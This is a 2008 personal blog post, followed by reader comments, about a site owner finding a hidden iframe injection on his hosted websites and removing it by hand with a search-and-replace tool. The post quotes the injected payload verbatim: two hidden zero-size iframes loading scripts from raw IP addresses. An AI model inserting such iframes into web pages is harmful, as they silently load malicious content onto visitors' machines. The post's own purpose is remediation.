Wednesday, November 26, 2008

How did I remove iFrame Injection off my sites??

I don't know how did I get this 'iFrame Injection' on my websites. I noticed it for the first time, when my webhost company shut down my service momentarily few months ago. The reason was ..one of the folder on my webhost space contained chunk of malwares and bad scripts. Upon checking, it was Ashish's folder and I noticed him deleting all the suspicious files after I informed him. Later on, he came up and told me that his sites were infected as well mines too. I noticed every websites I owned got this iframe Injection which looked similar like this below:

<iframe src="http://124.217.252.62/~admin/count.php?o=1" width=0 height=0 style="hidden" frameborder=0 marginheight=0 marginwidth=0 scrolling=no></iframe><iframe src="http://203.169.139.76/~admin/count.php?o=2" width=0 height=0 style="hidden" frameborder=0 marginheight=0 marginwidth=0 scrolling=no></iframe>

The ill-effects of this scripts are as follows to my understanding:
-steals your traffic(even if you've high traffic, search engine might consider you as an idle site)
-steals information of your customers on dynamic websites if infected.
-redirects to malicious sites on worst cases.
-extremely slow load-ups of websites.
-Search Engines might block your website for ever to be listed on their directories
-and more...

This code was injected on every main page of my websites. I called back to my webhost company and they suggested me that they are fighting with this issue more than me. They told me the only resolution is to nuke the entire account settings including databases/folders/etc and recreate everything. I didn't agree.. "You wouldn't kill a person in a name of curing his disease."

After searching a while and talking to so-called php guru, I tried Global_register = OFF from "php.ini" so as to stop the php code execution automatically. But that again shut down some of my sites which was inoperable without turning Global_register =ON

I manually deleted the remnants of that script so far I could. For sometimes, I thought it went away but deep within, I was sure that I didn't remove them all. Few weeks later, it was Hem's message that confirmed that my site is infected. He wrote that my personal blog was blacklisted on Google's Chrome for possible malicious site. I checked my other blog too. It was also blocked by Google's Chrome. Now, that was alarming for me. It looked something like this:


I was upset because I couldn't put my time on resolving this issue. I was way busy than I thought. After a month or say, I took time and sat in front of my computer to fight this problem. When I searched online for this particular issue, nobody had any solid solution except their mere high-tech ramblings and nothing else. I found my own simple ways to remove this iFrame hack problem.

Followings steps show how I removed the iFrame Injection off my websites:

1. First off, change all the passwords of hosting accounts, including the blog's admin passwords and so. I used https://www.grc.com/passwords.htm to generate hack-proof passwords. Took a bit out of it, somewhere else saved it. Next on, just copied/pasted the passwords whenever needed. Don't need to type all those weird characters at all.

2. Some said, the injection could've altered the databases. They suggested me to drop all the databases. I didn't believe them. I went to my hosting's PhpMyAdmin and ran a search query on entire databases. My search term was 'iframe' and other possible keywords. I didn't find any traces at all. You can 'Skip' this Step 2 if you don't know how to do that.

3. Next, I downloaded "Actual Search and Replace". Installed it. This software is for searching certain phrases irrespective of any file types and modifying them as per needed. Just as it's name suggests, search and Replace.

4. Now is the crucial part. FTP your accounts and download all possible infected files/folders off your host. Once you finished downloading them all and saved somewhere in your harddrive, run 'Active Search and Replace'. This is much much powerful than Window's Search or built-in Find feature. As soon as, you run this program, you'll know what to do next. Give the phrase as 'iframe', locate the location of downloaded Folders, and click 'FIND'. You'll see all legit/illegitimate entries. Most of the files it infected were as:
index.htm
index.html
index.php
header.php
footer.php
and some obnoxious file names..
Check all those suspicious files in your favorite HTML editors. Narrow your search in 'Actual Search and Replace'. Once confirmed, replace them all with nothing. Or to be on safe side, I actually edited them all one by one in Dreamweaver and deleted manually. Just in case not to remove the legit iframe codes from my html/php files. After I was done(took more than 4 hours), I re-uploaded all of them back to where it was before.

Next on, I didn't see the iFrame Injection coming up automatically as soon as I refreshed my pages. Press Ctrl+F5 for fresh reload of your web pages. This method of removing this malware is safe and solid. It helped me to remove this iFrame Injection off my websites. I'm confident because it's Day 29 after the successful removal of this iframe Injection.

I didn't see this solution anywhere on Internet. All php Gurus and experts suggested me to delete the entire system settings which I don't think is reasonable enough.

Note: Upon little research, I found this hack is originated from some part of the Russia but I found some script kiddies from Malaysia seemed using this hack on my servers. Many big corporate sites seemed affected with this problem and god knows how those security experts might have charged them in the name of remedy of this problem.


Thank you for reading my post.

3 comments:

Ashish said...

Yeah I remember this iframe attack. Those iframes made our pages never finish loading.

Nurse Jen Doll said...

I never knew all this. Nice info. I hate viruses.

-Nurse Jen Doll
www.nursejendoll.com
Your Daily Reality Nursing

Navin said...

Ashish, you are right. It has many ill-effects other than slow-loading.

Nurse Jen, you are the nurse, you know how to kill viruses.. give us some tips ;)

Copyright © 2014
Designed by Navin